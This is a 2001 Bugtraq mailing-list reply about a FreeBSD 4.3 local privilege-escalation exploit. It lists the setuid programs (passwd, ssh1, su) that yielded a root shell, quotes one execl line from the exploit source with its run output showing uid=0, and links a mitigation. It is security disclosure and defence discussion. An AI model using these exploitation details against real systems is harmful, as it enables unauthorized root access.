Bugtraq mailing list archives
Re: FreeBSD 4.3 local root
From: "Przemyslaw Frasunek" <venglin () freebsd lublin pl>
Date: Wed, 11 Jul 2001 14:31:06 +0200
Well, after a bunch of tests I've found only two suids which gave me suid shell: /usr/bin/passwd /usr/local/bin/ssh1
/usr/bin/su also works for me: riget:venglin:~> egrep -e execl vvfreebsd.c if(!execl("/usr/bin/su","su","szymon",0)) riget:venglin:~> ./v vvfreebsd. Written by Georgi Guninski shall jump to bfbffe72 child=57660 Password:done # id uid=0(root) gid=1001(users) groups=1001(users), 99(rexec)
So, quick workaround should be
Quick workaround is to limit arguments, environment and filter non-ascii characters: http://www.frasunek.com/sources/security/rexec/ -- * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE * * Inet: przemyslaw () frasunek com ** PGP: D48684904685DF43EA93AFA13BE170BF *
Current thread:
- Re: FreeBSD 4.3 local root Przemyslaw Frasunek (Jul 11)
- Re: FreeBSD 4.3 local root Matias Sedalo (Jul 15)
- Re: FreeBSD 4.3 local root Foldi Tamas (Jul 15)
- Re: FreeBSD 4.3 local root Przemyslaw Frasunek (Jul 15)